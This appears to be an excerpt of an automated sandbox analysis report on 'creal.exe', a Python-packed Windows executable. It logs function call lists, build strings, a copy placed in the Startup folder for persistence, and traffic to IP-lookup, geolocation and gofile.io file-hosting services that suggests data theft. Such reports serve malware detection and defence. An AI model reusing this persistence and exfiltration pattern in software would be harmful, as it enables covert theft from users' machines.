            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84BF1F0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,memcpy,28_2_00007FF8F84BF1F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84B9270 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,28_2_00007FF8F84B9270
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D3270 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,28_2_00007FF8F84D3270
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492121 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,28_2_00007FF8F8492121
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492478 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F8492478
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491F91 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,28_2_00007FF8F8491F91
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84913A2 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,28_2_00007FF8F84913A2
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491A0F ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,CRYPTO_memcmp,ERR_set_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_pop_to_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,strncmp,strncmp,strncmp,strncmp,strncmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8F8491A0F
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8494B40 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F8494B40
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492383 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F8492383
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F850AB20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F850AB20
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8492432 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F8492432
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491492 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,28_2_00007FF8F8491492
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84926C6 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,28_2_00007FF8F84926C6
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8502BC0 CRYPTO_memcmp,28_2_00007FF8F8502BC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491212 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,28_2_00007FF8F8491212
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84AABB0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,28_2_00007FF8F84AABB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DEBB0 CRYPTO_free,28_2_00007FF8F84DEBB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F4BB0 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F84F4BB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D8C60 CRYPTO_free,28_2_00007FF8F84D8C60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84DEC10 CRYPTO_free,28_2_00007FF8F84DEC10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8494C00 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F8494C00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D2C30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,28_2_00007FF8F84D2C30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84917DF ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,28_2_00007FF8F84917DF
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491CA8 CRYPTO_strdup,CRYPTO_free,28_2_00007FF8F8491CA8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84BEC90 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,28_2_00007FF8F84BEC90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491154 CRYPTO_free,ERR_new,ERR_set_debug,28_2_00007FF8F8491154
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A4D50 CRYPTO_get_ex_new_index,28_2_00007FF8F84A4D50
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F0D60 ERR_new,ERR_set_debug,CRYPTO_clear_free,28_2_00007FF8F84F0D60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84D8D10 OPENSSL_cleanse,CRYPTO_free,28_2_00007FF8F84D8D10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84914CE CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8F84914CE
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84917E9 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,28_2_00007FF8F84917E9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491771 CRYPTO_free,28_2_00007FF8F8491771
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84F6D90 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,28_2_00007FF8F84F6D90
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84A4DB0 i2d_X509_NAME,i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84A4DB0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84AEE43 CRYPTO_free,28_2_00007FF8F84AEE43
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F84922E8 CRYPTO_malloc,CONF_parse_list,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,28_2_00007FF8F84922E8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491A05 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,_time64,X509_free,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,28_2_00007FF8F8491A05
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F849258B ERR_new,ERR_set_debug,CRYPTO_free,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_cleanse,28_2_00007FF8F849258B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F850AED0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,28_2_00007FF8F850AED0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491370 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,28_2_00007FF8F8491370
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491460 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_snprintf,28_2_00007FF8F8491460
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49788 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49813 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49911 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49921 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.9:49934 version: TLS 1.2
            Source: creal.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: creal.exe, 00000002.00000002.1584456751.00007FF8E7BD3000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: creal.exe, 00000002.00000002.1579097857.00007FF8E712F000.00000002.00000001.01000000.00000019.sdmp
            Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: creal.exe, 00000002.00000002.1582537332.00007FF8E7642000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: creal.exe, 00000002.00000002.1582537332.00007FF8E7642000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: creal.exe, 00000002.00000002.1588731612.00007FF8F7A06000.00000002.00000001.01000000.00000014.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: creal.exe, 00000000.00000003.1371953608.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1590369480.00007FF8F8BC3000.00000002.00000001.01000000.00000005.sdmp, creal.exe, 0000001A.00000003.1541448676.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: creal.exe, 00000000.00000003.1371953608.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1590369480.00007FF8F8BC3000.00000002.00000001.01000000.00000005.sdmp, creal.exe, 0000001A.00000003.1541448676.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: creal.exe, 00000000.00000003.1372232763.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1541833635.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: creal.exe, 00000002.00000002.1589596642.00007FF8F8303000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: creal.exe, 00000002.00000002.1589772887.00007FF8F8751000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: creal.exe, 00000002.00000002.1580095250.00007FF8E7177000.00000002.00000001.01000000.00000016.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: creal.exe, 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: creal.exe, 00000002.00000002.1587898705.00007FF8E802C000.00000002.00000001.01000000.0000000A.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1587254717.00007FF8E7FA8000.00000002.00000001.01000000.00000013.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: creal.exe, 00000002.00000002.1574615880.00007FF8E6EF2000.00000002.00000001.01000000.0000002D.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: creal.exe, 00000002.00000002.1580428919.00007FF8E71B2000.00000002.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: creal.exe, 00000002.00000002.1589350978.00007FF8F7EC3000.00000002.00000001.01000000.0000000E.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: creal.exe, 00000002.00000002.1587898705.00007FF8E802C000.00000002.00000001.01000000.0000000A.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1589012234.00007FF8F7A9D000.00000002.00000001.01000000.00000009.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: creal.exe, 00000002.00000002.1590664825.00007FF8F8D84000.00000002.00000001.01000000.0000000B.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: creal.exe, 00000002.00000002.1587570318.00007FF8E7FF9000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: creal.exe, 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: creal.exe, 00000002.00000002.1590664825.00007FF8F8D84000.00000002.00000001.01000000.0000000B.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: creal.exe, 00000002.00000002.1555010440.00000185BB290000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: creal.exe, 00000000.00000003.1372232763.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1541833635.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdb source: creal.exe, 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: creal.exe, 00000002.00000002.1583452111.00007FF8E77AD000.00000002.00000001.01000000.00000010.sdmp
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A608B00 FindFirstFileExW,FindClose,0_2_00007FF67A608B00
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A617F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF67A617F4C
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A621FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF67A621FE4
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A617F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF67A617F4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CE8B00 FindFirstFileExW,FindClose,26_2_00007FF7C3CE8B00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,26_2_00007FF7C3CF7F4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,26_2_00007FF7C3CF7F4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D01FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_00007FF7C3D01FE4
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
            Source: Joe Sandbox ViewIP Address: 45.112.123.126 45.112.123.126
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 159.89.102.253 159.89.102.253
            Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8463E40 PyExc_ValueError,PyErr_SetString,PyEval_SaveThread,WSARecvFrom,PyEval_RestoreThread,#111,SetEvent,_Py_NoneStruct,28_2_00007FF8F8463E40
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /getServer HTTP/1.1Accept-Encoding: identityHost: api.gofile.ioUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /jsonp/8.46.123.189 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /getServer HTTP/1.1Accept-Encoding: identityHost: api.gofile.ioUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficHTTP traffic detected: GET /jsonp/8.46.123.189 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.12Connection: close
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: api.gofile.io
            Source: global trafficDNS traffic detected: DNS query: geolocation-db.com
            Source: global trafficDNS traffic detected: DNS query: store4.gofile.io
